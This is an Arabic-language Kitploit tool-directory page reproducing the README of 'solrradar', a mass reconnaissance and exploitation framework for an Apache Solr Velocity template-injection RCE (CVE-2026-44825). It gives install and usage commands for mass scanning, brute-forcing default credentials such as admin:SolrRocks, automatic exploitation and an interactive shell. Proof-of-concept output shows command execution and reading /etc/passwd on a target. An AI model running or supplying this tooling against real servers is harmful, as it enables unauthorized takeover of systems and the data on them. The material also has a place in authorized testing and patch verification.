Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
solrradar — ☄️ إطار عمل للاستطلاع والاستغلال الجماعي لـ Apache Solr CVE-2026-44825 — حقن قالب Velocity إلى RCE | Kitploit
أدوات/GitHubGitHub/shinthink/solrradar
الاستطلاعماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHub
5154منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
shinthink/solrradar

solrradar

☄️ إطار عمل للاستطلاع والاستغلال الجماعي لـ Apache Solr CVE-2026-44825 — حقن قالب Velocity إلى RCE

عرض المستودع

SolrRadar — ماسح Apache Solr لثغرة CVE-2026-44825

Python CVE License

Threads Version Brute RCE Shell

إطار استطلاع واستغلال جماعي لـ Apache Solr

حقن قالب Velocity → تنفيذ التعليمات البرمجية عن بُعد



📑 جدول المحتويات

  • نظرة عامة على الثغرة
  • الإصدارات المتأثرة
  • الميزات
  • التثبيت
  • الاستخدام
  • إثبات المفهوم
  • الغوص التقني العميق
  • منهجية الكشف
  • الدفاع والتخفيف
  • إخلاء المسؤولية
  • المراجع

🔴 نظرة عامة على الثغرة

CVE-2026-44825 هي ثغرة حرجة الخطورة في Apache Solr تتيح للمهاجمين تحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة عبر حقن قالب Velocity.

المشكلة

تقبل نقطة النهاية /select في Apache Solr معامل wt=velocity الذي يعرض قوالب Velocity المقدَّمة من المستخدم. عندما يكون كاتب استجابات Velocity (Velocity Response Writer) مفعّلاً (أو يمكن تفعيله عبر واجهة برمجة تطبيقات الإعدادات)، يمكن للمهاجم حقن قالب خبيث يستدعي java.lang.Runtime.exec()، مما ينفّذ أوامر نظام تعسفية بصلاحيات عملية Solr.

التأثير

المتجهالخطورةالتأثير
RCE بدون مصادقة9.8 (حرجة)اختراق كامل للنظام
RCE بمصادقة8.8 (عالية)تنفيذ أكواد بعد المصادقة
كشف المعلومات5.3 (متوسطة)تعداد النوى/المجموعات

محرك القوالب Velocity

يضمّن Apache Solr محرك Apache Velocity كمحرك قوالب اختياري لعرض الاستجابات. تكمن الثغرة في VelocityResponseWriter الخاص بـ Solr، والذي يعالج معاملات القوالب الخاضعة لتحكم المستخدم دون تعقيم مناسب، مما يسمح باستدعاء مباشر لواجهات انعكاس Java:

Java Reflection Chain:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)

🟠 الإصدارات المتأثرة

إصدار Apache Solrالحالةملاحظات
9.4.0 – 9.10.1🔴 معرَّض للثغرةاستغلال نشط في البيئات الحقيقية
10.0.0🔴 معرَّض للثغرةالإصدارات الأولية من 10.x متأثرة
10.0.1+🟢 مصحَّحتم نقل الإصلاح إلى الإصدارات السابقة
9.10.2+🟢 مصحَّحإصدار التصحيح متاح
≤ 9.3.x🟢 غير متأثرVelocity Response Writer غير موجود
8.x (جميعها)🟢 غير متأثرلا يوجد دعم لـ Velocity

ملاحظة: يتم إجراء فحوصات الإصدار تلقائياً عبر تحليل استجابة JSON الخاصة بالنقطة /admin/info/system.


✨ الميزات

🔍 الاستطلاع

  • فحص متعدد الأهداف — 30 خيطاً متزامناً، قابل للتهيئة
  • بصمة الإصدار — استخراج دقيق لإصدار Solr و Lucene
  • كشف ثنائي الوضع — SolrCloud + المستقل (عقدة واحدة)
  • فحص مدرك للمصادقة — يختبر 3 نقاط نهاية إدارية للتحقق من Basic Auth
  • تعداد المجموعات — يسرد المجموعات/النوى بدون مصادقة عندما يكون ذلك ممكناً

💀 الاستغلال

  • تخمين بيانات الاعتماد — قاموس مدمج لبيانات اعتماد Solr الافتراضية
  • Velocity RCE — حقن قالب عبر java.lang.Runtime.exec()
  • صدفة تفاعلية — طرفية زائفة لأوامر ما بعد الاستغلال
  • سلسلة استغلال تلقائية — كشف → تخمين → RCE في أمر واحد
  • تصدير JSON — مخرجات منظمة للتكامل مع أدوات أخرى

📦 التثبيت

# Clone the repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar

# Install dependencies
pip install -r requirements.txt

# Verify
python solr_scanner.py --help

المتطلبات

requests>=2.28.0
urllib3>=1.26.0

مكتبات قياسية فقط + requests. بدون تبعيات معقدة.


📖 الاستخدام

وسائط سطر الأوامر

CVE-2026-44825 Apache Solr Scanner

  -t, --target     Single target URL or IP[:port]
  -f, --file       File containing targets (one per line, # for comments)
  --exploit        Auto-exploit if vulnerable credentials are found
  --rce            Launch interactive shell after authentication
  -u, --user       Username for Basic Auth
  -pw, --password  Password for Basic Auth
  -o, --output     JSON output file path          (default: solr_results.json)
  -w, --workers    Number of concurrent threads   (default: 30)
  -T, --timeout    HTTP request timeout (seconds) (default: 8)

الفحص الأساسي

# Single target
python solr_scanner.py -t 192.168.1.100:8983

# Single target with custom path
python solr_scanner.py -t http://example.com/solr

# Mass scan from file
python solr_scanner.py -f targets.txt -o results.json

صيغة ملف الأهداف

# targets.txt — supports comments and blank lines
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24          # (CIDR not supported; pre-expand with external tool)

الاستغلال

# Scan + auto-exploit if creds found
python solr_scanner.py -f targets.txt --exploit

# Known credentials + interactive shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks

# Auto brute-force + shell on success
python solr_scanner.py -t target:8983 --rce

🧪 إثبات المفهوم

السيناريو 1: الكشف وبصمة الإصدار

$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner

Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...

[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
    Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr

Done. Total:3 | Solr:3 | Vuln:1

تم اكتشاف جميع الأهداف الثلاثة. تم وضع علامة على مثيل 9.4.1 كمعرَّض للثغرة مع تفعيل Basic Auth.


السيناريو 2: تخمين بيانات الاعتماد

$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner

[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
    [!] admin:SolrRocks
    Cols: ['cms', 'users', 'search', 'analytics']

بيانات الاعتماد الافتراضية admin:SolrRocks تمنح الوصول إلى واجهات برمجة Solr الإدارية. تم اكتشاف أربع مجموعات.


السيناريو 3: RCE بمصادقة عبر حقن Velocity

$ python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
CVE-2026-44825 Apache Solr Scanner

[+] admin:SolrRocks

solr$ id
uid=8983(solr) gid=8983(solr) groups=8983(solr)

solr$ hostname
solr-prod-cms-01.internal

solr$ whoami
solr

solr$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
solr:x:8983:8983:Solr:/var/solr:/sbin/nologin
...

solr$ exit

وصول كامل لصدفة تفاعلية بصلاحيات عملية Solr الخاصة بـ Java.


السيناريو 4: حمولة RCE (إعادة الإنتاج اليدوية)

للباحثين الذين يريدون فهم التبادل الخام لـ HTTP:

الخطوة 1 — التحقق من إمكانية الوصول إلى Solr

curl -sk 'http://target:8983/solr/admin/info/system' | jq '.lucene."solr-spec-version"'
# "9.4.1"
تنزيل الأداة